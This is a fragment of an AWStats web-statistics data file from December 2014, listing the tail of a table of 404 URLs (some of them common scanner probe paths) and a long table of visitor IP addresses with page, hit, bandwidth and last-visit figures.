/admin/fckeditor/editor/filemanager/browser/default/connectors/uploadtest.html 2 -
/clientscript/vbulletin_ajax_htmlloader.js 1 -
/bbs/ 11 -
/fckeditor/editor/filemanager/connectors/asp/upload.asp 1 -
/admin/template/article_more/config.htm 1 -
/wp/wp-login.php 3 -
/foosun/ 1 -
/zblog/ 1 -
/wp-content/force-download.php 2 -
/CHANGELOG.txt 1 -
/user/ 1 -
/page27.html 6 -
/ipboard/ 1 -
/lazycms/ 1 -
/page29.html 6 -
/admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx 1 -
/GUIClient.class 2 -
/help.aspx 1 -
/includes/fckeditor/editor/filemanager/upload/aspx/upload.aspx 1 -
/plus/heightsearch.php 1 -
/cms/ 19 -
/index.php 4 -
/2011adultseason/nuts.html%20ForceRecrawl:%200 2 -
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 10 first Hits must be first (order not required for others)
BEGIN_VISITOR 1409
62.210.83.26 79 79 1721792 20141227222406
109.120.157.179 72 72 3133764 20141229033902
5.9.73.48 66 66 1556804 20141227205036
37.187.144.114 60 60 1305317 20141229194955
91.207.8.46 51 51 1584777 20141229234014
82.193.99.33 48 48 1383651 20141230145934
151.55.66.212 48 54 802541 20141207050101
195.242.218.133 42 42 1828029 20141231104515
141.105.71.54 34 34 781210 20141222130941
37.59.32.148 34 34 897800 20141214203941
69.58.178.56 10 10 348404 20141203043114
189.228.196.200 1 11 154000 20141227140342
62.210.167.213 21 21 467571 20141224002724
146.148.82.130 1 1 20007 20141220111527
70.199.0.215 5 48 1104702 20141206130514
54.146.35.74 1 9 172523 20141201211649
217.69.133.169 2 2 87049 20141220035141
71.57.179.81 0 1 23473 
117.169.1.94 1 1 62113 20141217175837
202.46.62.175 1 1 22408 20141220144452
208.138.254.150 26 54 711165 20141218145210
66.249.88.177 3 3 154091 20141230103030
204.124.183.98 1 1 20862 20141228002914
75.88.10.197 5 32 582502 20141215220548
74.98.243.77 5 64 1520660 20141216001554
54.144.233.212 2 2 134084 20141213222558
171.5.98.19 1 11 154000 20141227033140
83.223.163.94 1 35 914050 20141211010200
109.194.230.199 4 4 80028 20141228072915
181.66.156.220 1 25 641262 20141209230431
201.79.79.51 1 25 641262 20141211125419
172.56.10.96 5 57 1469228 20141208145158
104.154.18.123 1 21 477734 20141204041429
54.163.137.154 2 18 250978 20141222043904
76.226.54.79 0 1 23295 
71.58.118.234 1 11 154000 20141228014943
206.248.70.172 1 11 154000 20141231184725
117.169.1.147 1 1 11337 20141212094424
54.172.122.205 1 1 0 20141211054422
74.111.103.67 2 28 687563 20141207131623
104.154.23.233 1 10 129147 20141230154841
172.56.10.222 3 44 1045104 20141213155833
147.154.235.102 5 32 763813 20141204105307
202.46.63.90 1 1 67042 20141209141121
173.252.103.0 0 2 42757 
31.148.246.247 1 1 20862 20141231195502
64.233.172.173 1 6 37980 20141215220741
72.21.217.99 1 1 67042 20141204193808
151.177.1.92 1 11 154000 20141228235040
96.245.55.200 0 1 12238 
54.162.88.156 1 1 20007 20141215195951
24.209.100.89 1 1 47714 20141212113000
98.236.195.68 5 47 1084318 20141206190032
46.147.228.224 1 9 172523 20141214072559
50.243.168.9 3 28 533662 20141226131938
71.61.174.218 5 34 805072 20141213092823
5.15.25.145 1 11 154000 20141228121239
69.171.163.89 5 35 608309 20141216171104
65.55.218.35 1 4 69367 20141211235333
189.4.226.47 1 11 154000 20141225223116
67.165.109.94 2 28 687563 20141213191749
184.148.13.167 0 1 18421 
66.87.94.80 2 43 488369 20141216152732
73.17.29.0 0 1 7505 
95.28.71.0 1 11 152002 20141202010513
71.60.50.22 2 14 200301 20141217213610
64.233.172.220 1 1 20007 20141222085507
73.183.73.207 2 40 998803 20141203192849
14.145.194.201 1 1 67042 20141201012902
200.138.70.86 1 25 641262 20141202234902
173.255.215.40 2 2 40014 20141223123943
89.153.62.220 1 36 942815 20141204124227
75.108.66.231 2 28 687563 20141206091940
134.249.76.28 30 30 1870155 20141216233420
195.154.169.97 1 1 20007 20141230222510
186.241.39.138 1 11 154000 20141229084918
58.23.232.110 1 1 67042 20141208103637
54.164.232.215 1 1 67042 20141202132331
66.249.83.224 6 6 265829 20141227091901
24.3.119.75 10 95 1751625 20141227112634
117.169.1.178 1 1 42324 20141218051637
108.32.91.143 2 14 200301 20141219092512
173.72.220.251 10 113 2745979 20141209153043
70.198.203.205 2 14 200301 20141217091721
66.230.73.254 2 28 687563 20141203122340
109.194.231.10 1 1 20007 20141228095748
12.161.199.50 2 28 687563 20141203093535
173.252.88.187 0 1 42728 
70.199.3.127 2 26 511541 20141231092319
108.168.217.83 1 1 20007 20141217130451
71.60.114.28 4 19 245830 20141231084706
207.243.62.25 4 33 742224 20141212161557
88.198.227.103 1 1 67042 20141201002529
201.76.127.1 1 11 154000 20141223100209
104.154.20.167 1 21 477734 20141203015553
173.209.212.200 0 1 5617 
201.254.43.40 0 1 29877 
69.40.191.224 1 1 67042 20141208103153
66.87.114.113 1 11 154000 20141226180506
72.46.136.178 2 2 40014 20141229212719
98.21.170.179 1 11 154000 20141226190335
177.205.0.56 1 35 907150 20141203153547
71.162.23.142 3 43 1045104 20141213113122
98.236.206.89 1 25 641262 20141207220008
183.228.127.119 1 1 183616 20141219064718
108.39.173.80 3 15 220308 20141221180111
204.108.251.77 2 26 511541 20141217201343
173.252.103.7 0 3 80262 
209.147.118.62 0 2 2325 
173.209.212.154 0 1 23762 
67.163.127.126 7 65 1403518 20141212111212
54.173.244.161 1 1 0 20141205080821
190.122.214.43 1 24 638382 20141213202444
47.22.145.18 0 1 7505 
65.55.212.87 0 1 8132 
125.212.121.122 1 11 154000 20141216061448
46.119.123.190 3 3 201126 20141201122915
71.60.62.208 3 30 709683 20141214230936
191.36.240.167 1 10 154000 20141216181638
54.83.192.61 1 1 18432 20141216101625
54.167.192.128 2 2 0 20141218163134
132.184.64.201 1 21 547561 20141207022745
117.174.237.204 1 1 65752 20141218013623
71.60.12.222 3 16 220308 20141228123610
72.10.120.200 0 2 15010 
92.38.29.222 2 2 40014 20141219150554
181.196.80.222 1 11 154000 20141221201752
130.211.161.48 1 1 67042 20141207110806
130.211.163.231 1 1 20007 20141228111436
65.111.165.175 1 1 67042 20141210125932
71.60.223.214 1 8 125489 20141229082232
111.10.28.88 1 1 47714 20141212131519
71.253.69.63 1 11 154000 20141227200844
54.237.173.81 1 1 67042 20141201183821
104.154.22.76 1 11 154000 20141228204111
66.102.6.221 5 11 411113 20141230090556
8.225.196.9 1 11 154000 20141217094252
201.67.110.249 1 11 154000 20141231164047
62.75.223.115 1 1 67042 20141202203312
24.131.113.61 2 14 187957 20141215194554
181.138.131.38 1 25 641262 20141211134415
107.23.45.196 2 2 40014 20141231214030
85.1.203.32 2 2 40014 20141219092026
119.63.193.132 1 1 20007 20141220141026
174.130.226.38 1 11 154000 20141228204655
204.171.50.120 5 64 1211783 20141216112721
50.26.246.239 0 1 12238 
68.193.36.184 4 30 749997 20141213162752
83.43.230.220 1 11 154000 20141228044145
54.174.84.200 1 1 0 20141211112957
65.52.242.216 1 1 20007 20141215191815
73.40.144.214 7 38 836900 20141204204239
70.199.5.222 1 1 67042 20141205172851
72.95.157.23 8 25 322751 20141221214754
76.125.141.17 3 33 443766 20141208062511
109.173.23.12 1 9 125489 20141226160134
208.103.116.222 4 19 228684 20141215104927
183.223.197.25 1 1 427040 20141218183254
183.220.245.51 1 1 60130 20141218004621
24.206.117.15 0 1 12535 
67.165.44.45 11 32 387024 20141216234913
144.76.155.8 5 5 139542 20141230110249
192.99.166.202 1 1 20007 20141227095219
24.125.60.251 2 14 200301 20141220101606
185.72.244.38 2 2 0 20141221121303
65.55.218.54 0 3 10457 
117.174.198.123 1 1 85599 20141218010259
67.185.115.208 0 1 8579 
107.77.76.91 0 1 7505 
54.198.122.232 1 1 20007 20141215200006
220.181.108.82 1 1 34803 20141209034708
200.161.238.82 1 29 728906 20141214082042
204.28.31.3 3 29 557842 20141219140312
98.243.9.210 1 1 424549 20141217174512
177.139.86.121 1 33 860816 20141207100536
112.64.235.247 1 4 153851 20141206054714
61.135.190.103 1 7 240660 20141207020821
176.9.207.91 1 1 16320 20141221002223
98.236.136.235 3 51 1349566 20141211185154
199.33.124.35 2 2 40014 20141223163519
98.219.138.188 4 45 1061390 20141208095601
201.172.33.213 1 11 154000 20141228230102
212.129.38.35 2 2 44188 20141225011737
117.169.1.161 1 1 63862 20141218101154
24.101.232.40 3 16 222421 20141223124108
198.12.73.195 1 1 67042 20141204173542
24.3.34.149 16 198 2834887 20141210204836
70.198.194.71 2 27 663869 20141207155211
71.236.71.213 1 11 154000 20141216082503
74.111.100.107 2 40 998803 20141206135641
220.181.108.99 1 1 18432 20141209034708
202.46.52.121 1 1 88000 20141229024634
176.102.38.36 2 2 0 20141216092309
104.154.16.170 2 16 214861 20141222005136
128.177.10.252 1 1 20862 20141204070832
189.83.29.154 1 11 154000 20141228132342
209.187.110.176 2 14 177408 20141231122631
112.207.208.25 1 24 576169 20141207183147
95.39.154.235 1 11 154000 20141221164829
198.211.117.220 12 15 522837 20141212005658
24.37.58.42 1 1 67042 20141209122659
70.199.3.149 2 40 998803 20141206142927
202.46.48.87 1 1 88000 20141228121738
24.3.63.88 1 25 641262 20141205112836
94.97.137.136 1 8 172523 20141201043045
176.9.127.182 1 1 67042 20141208103054
66.249.83.211 3 3 201126 20141208224758
62.47.231.207 1 11 154000 20141224193914
144.80.142.123 1 25 641262 20141205033433
200.122.142.101 1 25 641262 20141205180751
123.30.175.243 1 1 67042 20141210134003
71.60.37.25 4 31 579962 20141221093324
5.9.11.122 1 1 67042 20141205080352
108.62.82.148 1 1 67042 20141211014452
189.105.216.117 1 11 154000 20141222181508
74.111.101.155 3 16 216587 20141221220814
98.236.116.219 5 46 1134266 20141213131559
50.29.200.248 1 25 641262 20141209161118
207.167.42.54 4 57 855472 20141201143658
174.242.240.69 2 28 687563 20141204172150
184.80.171.50 2 14 200301 20141216110209
82.241.162.147 1 11 154000 20141228122102
130.211.144.34 1 1 67042 20141209111449
181.67.41.210 1 11 154000 20141230105813
27.147.254.248 1 10 154000 20141221162708
162.207.198.82 0 1 27033 
68.185.2.162 0 1 12238 
166.216.165.58 1 11 154000 20141224144221
131.253.24.146 0 3 13749 
92.98.233.182 1 24 641262 20141207122814
108.17.80.159 2 14 177408 20141217212950
98.21.175.111 2 48 976738 20141214221326
66.102.6.230 2 17 377490 20141229150220
65.112.68.2 4 19 238169 20141212113917
67.171.79.158 4 31 776725 20141214230633
223.86.218.154 1 1 78236 20141217155055
66.249.88.179 1 1 20007 20141225155242
104.154.28.33 1 7 110042 20141213090441
192.99.44.145 2 2 134084 20141211075217
71.182.138.212 1 11 154000 20141229084745
86.145.152.204 1 36 942815 20141212094058
107.77.75.59 0 1 19454 
117.169.1.109 1 1 424549 20141212101454
207.172.209.16 8 8 60021 20141220055815
75.117.148.194 0 1 18627 
70.178.47.79 0 1 18627 
180.76.4.19 1 1 20007 20141231200812
76.125.142.217 3 15 192893 20141219150630
50.241.108.10 0 1 7505 
128.2.136.59 2 14 200301 20141216112957
97.76.124.212 0 2 24853 
85.48.51.224 1 11 154000 20141225180509
204.195.128.240 5 35 757965 20141209201310
201.0.23.160 1 28 723621 20141203130947
174.55.57.247 3 29 682956 20141210061054
108.32.86.133 17 81 2494584 20141210213904
98.236.10.220 4 33 748865 20141203195422
199.30.25.137 0 4 37909 
76.125.255.94 2 14 200301 20141229215635
189.137.171.3 1 32 827591 20141205001527
93.80.152.154 1 9 172523 20141203173342
98.83.179.32 1 12 164785 20141203144258
174.60.63.165 12 67 1985377 20141220183633
104.154.16.113 1 9 125489 20141226174700
75.83.253.168 2 2 91223 20141203070923
76.125.247.93 3 31 442567 20141214190712
94.4.59.238 0 1 7505 
104.154.16.153 1 20 442069 20141209042458
46.147.234.194 2 20 279489 20141223045832
173.188.70.111 1 25 641262 20141206180142
187.113.176.103 1 11 154000 20141222130555
71.206.243.175 1 11 154000 20141225184935
67.184.39.230 0 1 6324 
70.192.9.239 1 11 154000 20141227171856
220.181.108.161 1 1 67042 20141209034708
208.94.186.231 3 51 641262 20141211125647
117.169.1.98 1 1 540209 20141217165544
90.157.21.79 1 1 20007 20141224072859
128.147.28.77 10 84 1642257 20141226152545
130.211.139.38 1 1 20007 20141230111408
71.60.174.30 3 29 754605 20141201134254
76.109.101.77 5 44 890306 20141215192118
186.247.17.191 1 11 154000 20141231214402
193.189.117.242 1 1 20007 20141216152153
66.249.83.199 6 6 261147 20141229195522
74.98.35.249 1 11 154000 20141231141036
117.169.1.47 2 2 154669 20141218195545
70.199.1.155 1 11 154000 20141226151408
189.47.90.45 1 11 154000 20141231094315
98.236.159.230 11 45 762242 20141227115619
93.159.230.90 1 15 277438 20141205090808
24.101.9.124 1 12 177129 20141226210854
88.198.140.4 1 1 67042 20141215015036
199.30.25.3 0 2 28511 
54.81.225.53 2 2 0 20141218163134
218.207.55.209 1 1 71017 20141218001035
72.95.249.70 3 30 709684 20141212212756
75.191.214.112 5 48 1104702 20141213161123
176.195.220.215 1 12 155140 20141201210220
58.23.19.210 1 1 20007 20141216101123
130.185.139.213 1 1 67042 20141209170255
54.145.96.218 2 18 345046 20141213223310
54.81.86.17 4 4 183462 20141213232232
83.28.211.232 1 1 67042 20141201014254
98.219.238.253 4 30 553235 20141230183811
190.132.154.23 1 8 172523 20141215082524
64.233.172.157 1 2 90804 20141213145200
96.47.224.50 0 24 570288 
66.87.102.154 0 1 13549 
198.252.44.15 8 8 348196 20141230003224
173.209.212.192 1 2 22121 20141219210318
199.168.151.88 1 25 641262 20141203103440
198.233.87.117 12 29 321600 20141222164002
222.239.162.7 6 6 261147 20141223073451
54.224.139.233 3 3 20007 20141218163135
108.3.93.61 1 11 154000 20141215204041
73.182.208.71 0 2 15010 
70.199.2.184 1 12 177129 20141230095014
93.150.232.91 1 28 699029 20141215175636
24.131.97.214 5 33 604492 20141219080957
173.252.101.113 0 1 27645 
179.232.254.156 1 33 851842 20141203081147
149.129.15.53 0 1 27033 
73.174.67.119 1 11 154000 20141215223736
76.125.142.243 5 48 1090633 20141207140739
54.174.91.172 1 1 0 20141207125640
98.236.2.182 2 12 174007 20141231131219
166.137.252.127 1 25 641262 20141202051037
99.182.225.247 0 2 24476 
32.217.24.234 0 1 7505 
61.135.190.222 0 4 48656 
98.219.181.68 2 27 534670 20141230210645
70.15.250.112 0 1 12238 
61.135.190.101 0 2 24328 
54.237.143.218 1 9 172523 20141210205737
71.61.204.65 2 14 200301 20141231155548
190.103.225.12 1 11 154000 20141229175140
191.43.23.18 1 36 942815 20141203202053
66.249.84.211 2 2 87049 20141220122147
50.248.69.82 3 15 207964 20141218112811
111.10.29.127 1 1 124388 20141218201347
66.249.83.235 1 1 67042 20141209224727
71.60.173.181 3 29 754605 20141201093448
69.40.180.132 1 11 164443 20141206112116
108.32.94.64 4 18 210999 20141228203534
24.144.165.155 2 26 511541 20141227221524
117.169.1.86 2 2 101303 20141218100903
23.22.10.148 2 18 345046 20141206012429
71.230.19.161 7 74 1730220 20141210202911
73.51.196.151 0 1 18186 
197.207.13.60 1 8 125489 20141216143137
107.77.76.61 2 28 687563 20141213131520
71.41.144.218 3 48 1139289 20141201223135
173.189.148.123 1 25 641262 20141213092601
65.55.212.67 0 2 65645 
75.149.19.201 3 43 1045104 20141212083737
74.98.48.198 29 99 942565 20141225110849
191.32.90.32 1 26 666768 20141205171503
201.235.152.99 1 25 641262 20141203080039
54.173.164.2 1 1 0 20141209220740
73.43.157.78 3 43 1045104 20141207091153
69.171.228.123 0 1 28765 
71.61.21.23 1 25 641262 20141207160755
24.131.100.26 4 18 236160 20141222144539
104.154.16.100 1 1 67042 20141208200215
54.162.91.158 2 2 40014 20141228194432
74.51.164.119 2 26 511541 20141223092840
192.81.215.7 11 19 474467 20141202063104
173.70.36.64 0 1 13165 
4.68.92.68 1 25 641262 20141204171248
173.252.77.114 0 2 62063 
108.1.77.72 3 29 557842 20141231125544
117.177.242.171 1 1 0 20141212125335
54.173.248.91 1 1 0 20141210161158
117.198.112.16 1 8 125489 20141217021354
70.89.110.226 2 13 176121 20141220093006
162.223.16.2 3 17 227617 20141217112456
54.172.151.220 2 2 0 20141210162143
202.46.54.62 1 1 22408 20141219194013
8.225.195.5 2 40 998803 20141209152634
130.211.135.165 1 1 20007 20141223111435
174.242.241.66 1 11 154000 20141222221915
107.77.76.52 0 1 7505 
96.60.46.83 0 1 20008 
173.252.103.5 0 2 56420 
123.125.71.19 1 1 67042 20141208232156
172.56.28.97 4 32 729257 20141205003804
98.236.113.11 1 12 177129 20141201111117
117.169.1.10 1 1 129182 20141212132248
69.242.55.21 6 36 1182152 20141209211426
54.174.30.81 1 11 154000 20141218163134
71.60.89.67 2 27 668109 20141201134654
191.250.233.75 1 1 20007 20141228194920
54.204.112.36 1 1 20007 20141220205634
166.216.165.57 0 1 12535 
98.16.114.241 7 37 688579 20141220092157
41.204.117.115 1 11 154000 20141229082430
223.197.193.83 1 1 67042 20141210173243
198.8.34.218 1 11 147114 20141216104333
166.137.252.75 2 28 687563 20141208201911
207.91.54.10 2 14 180741 20141220214225
170.185.83.19 0 2 24476 
221.178.21.201 1 1 52865 20141212104908
50.243.182.89 1 11 154000 20141229144446
61.135.190.223 0 4 48656 
66.102.6.239 2 5 200855 20141215085451
73.186.223.151 0 1 7505 
24.3.208.35 2 50 1282524 20141212144629
96.236.201.185 1 11 154000 20141229145035
69.171.230.116 0 2 64116 
79.30.217.5 1 11 154000 20141227215040
203.21.151.14 0 1 20533 
79.43.134.136 1 33 847309 20141204140326
96.236.205.89 2 13 172522 20141218220947
198.211.107.189 11 14 361725 20141218004934
199.30.25.135 0 6 96084 
189.121.183.133 1 25 641262 20141206095340
208.40.161.242 1 25 641262 20141202100833
24.131.74.230 2 2 134084 20141203210315
54.172.237.216 1 1 67042 20141201225833
50.152.127.124 4 26 757297 20141227092329
104.154.16.111 1 20 477168 20141204090334
70.198.194.150 1 1 67042 20141208133442
179.223.24.64 1 36 942815 20141205080707
69.171.237.118 0 1 25506 
104.154.16.117 1 21 477734 20141203162919
67.163.136.149 2 28 675219 20141206082547
101.222.187.166 0 1 18186 
72.23.59.252 5 19 231883 20141219072412
130.211.155.241 1 1 67042 20141203111529
69.116.136.17 0 1 18421 
217.73.208.27 1 1 20007 20141221143013
174.252.194.165 1 23 637604 20141208210508
54.166.168.129 1 1 20007 20141215195952
98.219.176.230 2 28 687563 20141204144459
146.148.67.76 1 1 67042 20141213111523
187.71.47.47 1 25 629958 20141207144049
96.47.225.162 0 25 594050 
178.137.165.25 18 18 1065651 20141221162127
74.111.184.176 1 25 641262 20141201140133
74.109.253.103 2 28 669609 20141213140844
24.210.188.185 0 1 23295 
95.21.159.66 1 26 659974 20141215101137
98.111.213.50 1 11 154000 20141215205952
112.18.23.104 1 1 129182 20141217221809
192.99.222.126 1 1 0 20141215102543
54.172.114.2 1 1 67042 20141201230350
174.242.194.133 2 28 669609 20141214230629
190.160.105.82 1 25 641262 20141203125519
70.198.196.5 1 12 177129 20141215054730
147.255.56.183 1 1 67042 20141211004953
107.77.76.116 1 11 154000 20141226191246
50.17.173.39 1 1 20007 20141217012104
130.211.172.216 1 1 67042 20141204111550
184.12.54.33 2 27 663869 20141202013120
104.154.16.152 1 16 377176 20141209114706
97.65.87.2 1 22 538014 20141205150841
112.198.77.32 1 11 154000 20141223054305
96.38.105.251 0 2 44022 
189.27.85.141 1 11 154000 20141228104909
68.9.21.246 0 1 7505 
117.169.1.30 1 1 59809 20141217204035
151.16.191.192 1 11 154000 20141217133936
223.86.213.137 1 1 75712 20141217163821
46.229.170.197 1 1 20007 20141224201119
166.137.252.50 2 14 200301 20141217134052
72.23.246.2 1 25 641262 20141209141620
189.106.110.210 1 8 172523 20141202162946
208.38.200.198 0 1 26154 
66.87.78.242 0 1 25518 
27.159.226.230 2 2 134084 20141202215412
176.196.106.176 1 1 20007 20141228235357
98.236.160.226 2 22 152460 20141221093853
173.209.212.227 0 1 62481 
166.137.8.20 0 1 12238 
71.60.115.122 1 25 641262 20141206023253
71.61.102.139 5 46 884831 20141218114645
207.190.236.213 1 1 59809 20141208103720
115.167.73.24 0 1 24853 
104.154.19.158 1 1 67042 20141213235406
177.75.144.150 1 25 641262 20141208130617
67.141.199.5 1 11 154000 20141227131119
71.61.251.247 1 25 641262 20141204084633
77.91.48.193 0 1 20533 
82.73.234.254 0 1 20533 
107.143.251.52 0 2 58416 
79.17.66.232 1 8 172523 20141215132759
70.198.198.111 1 18 259482 20141224225050
96.229.206.230 0 1 8579 
117.169.1.15 1 1 540209 20141212094335
71.60.142.94 1 11 154000 20141228160846
65.55.212.68 0 1 1759 
187.232.87.102 1 11 154000 20141225013013
173.75.15.86 2 28 687563 20141204192647
130.211.113.93 1 1 67042 20141208111516
74.73.166.30 5 37 797710 20141205095711
104.219.248.86 23 23 648690 20141209145252
117.169.1.100 1 1 67136 20141212085700
187.74.137.62 1 11 154000 20141228155029
114.198.51.192 1 11 154000 20141225235419
211.244.83.215 3 3 107056 20141229003747
110.89.36.170 1 1 67042 20141201235643
66.87.114.218 1 6 119306 20141220115954
93.89.159.8 6 6 201126 20141210050216
174.242.224.233 4 32 583509 20141227184706
202.46.61.121 1 1 22408 20141218191129
173.252.101.117 0 2 64116 
130.211.131.104 1 1 20007 20141222111458
99.59.126.165 0 1 18186 
104.154.16.192 1 1 20007 20141230005155
117.169.1.170 1 1 82217 20141217144739
104.154.30.80 1 8 172523 20141211002830
173.75.137.140 2 28 687563 20141211180444
117.169.1.129 1 1 62113 20141212102601
66.249.93.182 0 4 90674 
76.23.135.24 0 1 7505 
68.77.236.5 1 25 641262 20141209111018
74.111.178.205 1 25 641262 20141214192907
98.139.134.97 2 2 40014 20141222084406
75.117.99.225 1 1 20007 20141223120407
173.44.37.242 0 24 570288 
172.56.5.168 4 32 732291 20141205144947
71.60.100.146 1 1 67042 20141204011220
46.4.99.111 1 11 154000 20141220085502
70.199.2.66 2 14 200301 20141223133723
189.81.158.163 1 24 609985 20141208090814
24.3.98.75 3 27 531548 20141227143914
162.226.220.87 0 1 23295 
119.247.114.158 1 11 154000 20141229131846
208.110.85.242 5 5 191810 20141204061116
201.93.235.197 1 25 641262 20141213130637
74.98.198.173 1 25 641262 20141209000131
5.55.72.159 1 11 154000 20141231154406
72.95.162.11 2 40 998803 20141212063310
198.184.147.52 7 87 2157250 20141208074710
128.147.64.50 2 14 200301 20141217154933
130.49.188.79 2 28 687563 20141210152149
79.110.17.39 1 1 20007 20141223054829
117.175.48.205 1 1 48869 20141218124941
173.255.112.126 1 1 20007 20141221111424
192.114.71.13 0 1 7505 
173.209.211.169 0 1 12238 
98.239.238.73 8 61 1123455 20141209124553
176.9.143.245 1 1 67042 20141205112703
193.201.224.18 1 1 30465 20141201131258
208.93.104.10 2 2 40014 20141223231110
220.181.108.153 1 1 30805 20141209034708
76.97.194.104 0 1 23295 
72.77.74.191 1 11 154000 20141225220106
216.21.192.252 1 1 183616 20141228124348
179.236.9.85 1 25 641262 20141209124608
71.60.5.194 2 28 667905 20141214200231
117.169.1.40 1 1 457630 20141218012046
193.201.224.74 1 1 30465 20141201032314
63.250.204.25 0 1 23295 
201.8.43.150 1 19 448526 20141209084156
66.102.6.93 2 2 134084 20141204162915
76.125.248.146 3 16 222421 20141220173404
71.60.106.80 4 17 242429 20141226095244
104.154.16.103 1 24 617500 20141202104838
178.79.14.249 1 11 154000 20141228053024
189.10.226.101 1 11 154000 20141231113828
202.78.127.146 1 11 154000 20141216102319
94.153.9.175 3 3 60021 20141231125441
54.173.100.245 1 1 0 20141210134413
149.210.138.153 2 2 40014 20141224084843
24.60.146.140 0 1 7505 
130.211.179.183 1 1 20007 20141227111426
54.163.177.46 2 2 134084 20141209104929
32.210.240.240 0 1 7505 
130.211.153.30 1 1 67042 20141201111651
154.20.231.69 1 25 641262 20141208004926
199.248.185.22 1 11 154000 20141219144156
187.78.140.145 1 26 659974 20141215133937
98.239.252.107 4 42 863176 20141231095937
208.94.43.227 4 26 353214 20141217120650
71.61.20.171 1 12 154236 20141206231603
65.55.218.48 0 1 566 
65.184.177.137 0 1 19454 
71.61.207.37 3 43 1045104 20141206092026
54.86.37.108 2 12 174007 20141218163134
89.132.15.243 1 24 605597 20141214111916
104.154.17.148 1 21 477734 20141203092802
203.106.100.140 1 25 641262 20141210120330
75.151.230.249 2 27 663869 20141211115008
131.253.36.201 0 2 24328 
173.26.208.123 0 1 23295 
61.135.190.104 1 3 192004 20141209071858
23.20.98.243 2 2 0 20141218163135
50.138.200.65 0 1 7505 
93.44.240.118 1 11 154000 20141219045231
176.9.25.25 1 1 67042 20141201021213
70.114.35.26 1 36 942815 20141213044627
117.175.36.13 1 1 52865 20141217183028
98.236.118.72 4 31 560653 20141217115738
91.236.75.4 2 2 41724 20141223093319
72.95.187.194 4 31 767902 20141207192951
31.184.238.181 2 2 40014 20141229202718
98.239.236.39 8 38 646858 20141219141025
166.137.136.80 1 11 152949 20141212135155
27.159.255.91 1 1 20007 20141231165108
98.236.11.53 1 2 67042 20141203214219
173.75.27.231 1 24 322084 20141223210019
68.109.26.20 0 1 7505 
152.246.40.209 1 18 415526 20141203203401
74.109.220.46 2 14 187957 20141215200709
70.199.1.117 1 8 125489 20141217190554
173.252.77.112 0 1 26543 
189.139.0.51 1 1 20007 20141229231303
64.125.188.25 0 1 27033 
66.147.244.208 2 2 40869 20141227191832
108.1.70.89 5 20 243974 20141221164532
104.154.25.219 1 9 125489 20141223143808
66.66.134.114 0 1 12238 
88.80.186.116 1 1 20007 20141231031201
204.43.204.108 1 25 641262 20141212114112
71.60.5.15 2 14 172307 20141216073701
12.108.122.194 1 25 641262 20141202134805
24.239.33.208 1 12 163935 20141211155047
68.109.231.232 0 1 7505 
173.209.212.152 1 6 57216 20141215211039
65.55.212.85 0 1 5617 
24.154.125.55 4 33 738031 20141213230247
178.32.5.32 1 1 20007 20141230101059
199.30.24.34 0 1 24853 
177.105.145.233 1 11 154000 20141216100544
65.55.211.249 1 6 158774 20141205145949
54.172.212.179 1 1 67042 20141204193822
173.252.103.3 0 2 68963 
117.169.1.117 1 1 11337 20141217165625
67.163.248.170 3 15 192547 20141220210707
71.61.0.32 6 21 272012 20141216112752
189.75.43.39 1 11 154000 20141222090244
70.210.228.179 0 1 79160 
54.161.106.59 1 1 20007 20141216124237
201.8.100.157 1 27 673523 20141207205800
192.69.92.87 2 2 40014 20141219033705
50.248.80.106 3 16 222422 20141222103845
69.171.228.119 0 2 46334 
180.211.143.247 1 11 154000 20141229001632
104.210.34.167 1 1 67042 20141215132907
24.9.244.190 1 11 154000 20141231144743
75.144.7.101 3 16 200869 20141201111348
166.137.252.90 0 2 41941 
146.148.84.179 1 1 67042 20141212111524
107.77.76.33 3 30 731712 20141203154018
50.200.74.67 3 16 222422 20141216114529
161.150.176.2 3 17 234258 20141215192408
179.214.173.118 1 36 942815 20141208164704
174.250.3.153 2 29 687563 20141213102842
14.140.246.66 1 26 659974 20141201022722
205.254.147.8 3 43 1045104 20141212100621
54.145.110.187 2 18 254653 20141228195446
69.35.177.186 0 1 29290 
177.147.70.154 1 1 20007 20141228135928
67.171.73.249 4 33 747161 20141206113643
24.60.145.5 0 1 7505 
54.81.2.166 4 4 89392 20141228194624
197.148.59.27 1 11 154000 20141224074828
73.40.244.232 5 47 1089831 20141205171259
173.252.100.113 0 1 25506 
76.125.213.88 2 28 664670 20141214000450
187.20.149.43 1 35 907150 20141212185938
98.219.170.179 5 21 278499 20141220171840
107.77.76.118 0 1 7505 
204.69.182.1 4 50 995563 20141224131721
66.87.114.168 8 40 876035 20141208092847
73.174.115.140 2 28 687563 20141207101445
117.169.1.181 2 2 446964 20141218073042
50.153.131.143 0 1 7505 
70.198.195.62 1 11 154000 20141215225222
107.77.75.49 1 24 522850 20141207173853
117.169.1.46 1 1 2885415 20141217210603
177.193.5.120 1 11 154000 20141226130741
98.239.176.160 2 14 200301 20141216165149
66.220.156.116 0 1 42728 
107.197.31.29 2 14 187957 20141230003428
179.236.254.164 1 11 154000 20141229141817
93.41.248.13 1 28 707962 20141205102622
104.154.16.132 1 26 659974 20141203081912
200.162.171.175 1 34 887064 20141212124847
78.135.79.181 2 2 40014 20141219062938
38.111.144.145 1 1 20007 20141217092304
166.137.252.123 0 1 21276 
50.57.104.33 1 1 20007 20141223042446
191.17.105.18 1 11 154000 20141215194648
198.252.44.5 6 6 261147 20141228184043
70.199.1.120 4 18 242356 20141215235011
31.210.47.136 2 26 641262 20141210154345
128.147.28.74 5 35 769567 20141204133735
166.181.80.2 0 1 25506 
62.210.79.109 21 21 466716 20141224234612
67.195.195.146 0 1 35665 
192.99.201.209 6 6 167077 20141226163924
41.150.0.88 1 8 125489 20141230024314
130.211.172.214 1 1 67042 20141205111639
177.5.83.67 1 8 125489 20141229204805
64.132.126.227 1 12 177129 20141210194721
209.255.143.195 3 29 680155 20141209105105
189.58.161.220 1 24 608477 20141210045636
66.249.83.218 5 10 405169 20141217081305
70.199.7.3 0 1 12238 
173.252.77.119 0 1 32785 
75.151.231.233 4 38 882207 20141202160924
173.44.37.234 0 23 546526 
50.204.84.3 21 87 2026782 20141216103034
190.254.1.202 2 2 91223 20141207192924
177.21.252.170 1 24 605597 20141215090108
66.249.84.218 2 2 87049 20141216043016
69.171.228.118 0 1 29208 
201.17.119.143 1 23 580319 20141209122629
71.61.46.159 1 11 154000 20141215221447
160.9.41.53 1 25 641262 20141204144538
71.60.82.33 1 1 15589 20141206162332
71.112.136.5 3 57 1260460 20141203112753
